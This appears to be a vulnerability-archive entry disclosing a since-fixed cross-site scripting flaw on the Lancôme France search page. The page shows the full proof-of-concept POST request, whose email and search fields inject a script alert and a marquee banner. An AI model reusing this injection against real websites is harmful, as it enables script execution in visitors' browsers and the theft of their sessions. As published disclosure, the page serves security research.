Advertisements:
Security researcher Xylitol, has submitted on 24/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.lancome.fr, which at the time of submission ranked 118240 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2010. It is currently fixed.
Date submitted: 24/01/2009 Date published: 22/05/2010 Date fixed: 22/05/2010Status:  FIXED
Author: Xylitol Domain: www.lancome.fr Category: XSS Pagerank: 118240
URL: http://www.lancome.fr/_fr/_fr/search/results.aspx
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMDkzOTgxOTUzO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47 bDx0PDtsPGk8Mz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MD47aTwxPjtpPDM%2BO2k8ND47Pj tsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxAPFw8YnJcPk1lcmNpIGRlIHbD qXJpZmllciB2b3RyZSBhZHJlc3NlIGUtbWFpbC47Pjs7Pjs%2BPjt0PDtsPGk8Mz47PjtsPHQ8QDxcZTs%2BOzs%2BOz4%2BOz4% 2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BO2k8Mj47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MD47Pj tsPHQ8O2w8aTwwPjs%2BO2w8dDxAPE11c3RoYXZlX2xpc3RlX3Byb2R1aXRzOz47Oz47Pj47Pj47Pj47Pj47dDw7bDxpPDA%2BOz 47bDx0PDtsPGk8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PEA8QmVzdFNlbGxlcnNfbGlzdGVfcHJvZH VpdHM7Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PD tsPGk8MD47PjtsPHQ8QDxJZGVlc0NhZGVhdXhfamV1bmVfZmVtbWU7Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjt0PDtsPGk8 MD47PjtsPHQ8O2w8aTwxPjtpPDI%2BO2k8Mz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PEA8XGU7MDtcZT s%2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PEA8MDs%2BOzs%2BOz4%2BOz4%2BO3Q8O2 w8aTwwPjtpPDU%2BO2k8MTA%2BO2k8MTU%2BO2k8MjA%2BO2k8MjU%2BO2k8MzA%2BO2k8MzU%2BO2k8NDA%2BO2k8NDU%2BO2k8 NTA%2BO2k8NTU%2BO2k8NjA%2BO2k8NjU%2BO2k8NzA%2BO2k8NzU%2BO2k8ODA%2BO2k8ODU%2BO2k8OTA%2BOz47bDx0PDtsPG k8MD47PjtsPHQ8QDwxODQ7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPEhvbW1lXD47Li4vY2F0YWxvZy9jYXRlZ2 9yeW1lbi5hc3B4O0FYRU1lbl5GMV9BZ2VGaWdodDs%2BOzs%2BO3Q8QDxBR0UgRklHSFQ7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwx Pjs%2BO2w8dDxAPE1hcXVpbGxhZ2VcPk1hcXVpbGxhZ2UgZGVzIHlldXhcPk1hc2NhcmFzXD47Li4vY2F0YWxvZy9zdWJjYXRlZ2 9yeS5hc3B4O0FYRU1ha2V1cF5GMV9FeWVzXkYyX0V5ZV9NYXNjYXJhc15GM19FeWVfTWFzX0xlbmd0aGVuaW5nOz47Oz47dDxAPE FsbG9uZ2VhbnRzOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxTb2lucyB2aXNhZ2VcPjsuLi9jYXRhbG9nL2NhdGVn b3J5LmFzcHg7QVhFU2tpbmNhcmVeRjFfU21vb3RoaW5nOz47Oz47dDxAPEFudGktw6JnZTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPj tpPDE%2BOz47bDx0PEA8Q29ycHMtU29sYWlyZXNcPlNvaW4gZHUgY29ycHNcPlNvaW4gZHUgQ29ycHNcPjsuLi9jYXRhbG9nL2Nh dGVnb3J5LmFzcHg7QVhFQm9keVN1bmNhcmVeRjFfQm9keWNhcmVeRjJfQm9kX0JvZHljYXJlXkYzX0NlbGx1bGl0ZTs%2BOzs%2B O3Q8QDxBbnRpLWNlbGx1bGl0ZTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BOz47bDx0PEA8TWFxdWlsbGFnZVw%2BTWFxdW lsbGFnZSBkdSB0ZWludFw%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVNYWtldXBeRjFfQ29tcGxleGlvbl5GMl9D b21fU21vb3RoaW5nOz47Oz47dDxAPEFudGktY2VybmVzOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxTb2lucyB2aX NhZ2VcPlNvaW4geWV1eCBldCBsw6h2cmVzXD5SaWRlcyAtIE1hbnF1ZSBkZSBmZXJtZXTDqVw%2BOy4uL2NhdGFsb2cvc3ViY2F0 ZWdvcnkuYXNweDtBWEVTa2luY2FyZV5GMV9FeWVzTGlwc15GMl9FeWVfTGlmdGluZ15GM19BbnRpLXdyaW5rbGVzOz47Oz47dDxA PEFudGktUmlkZXMgLSBGZXJtZXTDqTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BOz47bDx0PEA8Q29ycHMtU29sYWlyZXNc PlNvaW5zIHNvbGFpcmVzXD47Li4vY2F0YWxvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRUJvZHlTdW5jYXJlXkYxX1N1bmNhcmVeRjJf U3VuX0FmdGVyU3VuOz47Oz47dDxAPEFwcsOocy1Tb2xlaWw7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPFNvaW5z IHZpc2FnZVw%2BSHlkcmF0YW50cyBzcMOpY2lmaXF1ZXNcPlBlYXV4IE5vcm1hbGVzIMOgIE1peHRlc1w%2BOy4uL2NhdGFsb2cv c3ViY2F0ZWdvcnkuYXNweDtBWEVTa2luY2FyZV5GMV9Nb2lzdHVyaXplcnNeRjJfTW9pX05vcm1hbFNraW5eRjNfTW9pX05vcm1h bF9hcXVhZnVzaW9uOz47Oz47dDxAPEFxdWEgRnVzaW9uOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxDb3Jwcy1Tb2 xhaXJlc1w%2BOy4uL2NhdGFsb2cvY2F0ZWdvcnkuYXNweDtBWEVCb2R5U3VuY2FyZV5GMV9Bcm9tYTs%2BOzs%2BO3Q8QDxBcm9t YSBFeHBlcmllbmNlOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxDb3Jwcy1Tb2xhaXJlc1w%2BQXJvbWEgRXhwZXJp ZW5jZVw%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVCb2R5U3VuY2FyZV5GMV9Bcm9tYV5GMl9Bcm9fVG9uaWM7Pj s7Pjt0PEA8QXJvbWEgVG9uaWM7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPENvcnBzLVNvbGFpcmVzXD5Tb2lucy Bzb2xhaXJlc1w%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVCb2R5U3VuY2FyZV5GMV9TdW5jYXJlXkYyX1N1bl9T ZWxmVGFuOz47Oz47dDxAPEF1dG9icm9uemFudHM7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPFNvaW5zIHZpc2Fn ZVw%2BSHlkcmF0YW50cyBzcMOpY2lmaXF1ZXNcPlBlYXV4IE5vcm1hbGVzIMOgIE1peHRlc1w%2BOy4uL2NhdGFsb2cvc3ViY2F0 ZWdvcnkuYXNweDtBWEVTa2luY2FyZV5GMV9Nb2lzdHVyaXplcnNeRjJfTW9pX05vcm1hbFNraW5eRjNfTW9pX05vcm1hbF9iaWVu ZmFpdDs%2BOzs%2BO3Q8QDxCaWVuZmFpdCBNdWx0aS1WaXRhbDs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BOz47bDx0PEA8 U29pbnMgdmlzYWdlXD5IeWRyYXRhbnRzIHNww6ljaWZpcXVlc1w%2BUGVhdXggTm9ybWFsZXMgw6AgTWl4dGVzXD47Li4vY2F0YW xvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRVNraW5jYXJlXkYxX01vaXN0dXJpemVyc15GMl9Nb2lfTm9ybWFsU2tpbl5GM19Nb2lfTm 9ybWFsX2JpZW5mYWl0Oz47Oz47dDxAPEJpZW5mYWl0IE11bHRpLVZpdGFsOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8 QDxNYXF1aWxsYWdlXD5NYXF1aWxsYWdlIGR1IHRlaW50XD47Li4vY2F0YWxvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRU1ha2V1cF5G MV9Db21wbGV4aW9uXkYyX0NvbV9CbHVzaGVzOz47Oz47dDxAPEJsdXNoIGV0IElsbHVtaW5hdGV1cnM7Pjs7Pjs%2BPjt0PDtsPG k8MD47aTwxPjs%2BO2w8dDxAPE1hcXVpbGxhZ2VcPk1hcXVpbGxhZ2UgZGVzIGzDqHZyZXNcPlJvdWdlcyDDoCBsw6h2cmVzXD47 Li4vY2F0YWxvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRU1ha2V1cF5GMV9MaXBzXkYyX0xpcF9MaXBzdGlja3NeRjNfTGlwX0xpcF9T aGlueTs%2BOzs%2BO3Q8QDxCcmlsbGFudHM7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPDsuLi9oYWlyY2FyZS9p bmRleC5hc3B4O0FYRUhhaXJjYXJlOz47Oz47dDxAPENhcGlsbGFpcmVzOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QD xDYXBpbGxhaXJlc1w%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVIYWlyY2FyZV5GMl9IYWlyX0NvbG9yZWQ7Pjs7 Pjt0PEA8Q2hldmV1eCBjb2xvcsOpczs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxAPDE7Pjs7Pjs%2BPjs%2BPjs%2BPj s%2BPjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs% 2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8Mz47PjtsPHQ8QDw7Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPj s%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjtsPF9jdGwwOl9jdGwwOmJyYW5kbGF5b3V0MDpfY3RsMDpfY3RsMzpfY3RsMDpfY3 RsMDpfY3RsMDpfY3RsMDpfY3RsMDpfY3RsMDpzdWJtaXQ7Pj4%3D&_ctl0%3A_ctl0%3Abrandlayout0%3A_ctl0%3A_ctl0%3A _ctl0%3A_ctl1%3Aemail=+%27%22%3E%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%3CM ARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXSS+by+Xylitol%3C%2FH1%3E%3C%2FMARQUEE%3E&search=+%27%22%3E%3C% 2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3 EXSS+by+Xylitol%3C%2FH1%3E%3C%2FMARQUEE%3E&_ctl0%3A_ctl0%3Abrandlayout0%3A_ctl0%3A_ctl3%3A_ctl0%3A_c tl0%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3Alogin=Identifiant&passfake=Mot+de+passe&_ctl0%3A_ctl0%3Abrandl ayout0%3A_ctl0%3A_ctl3%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3Apassword=
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense 		Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.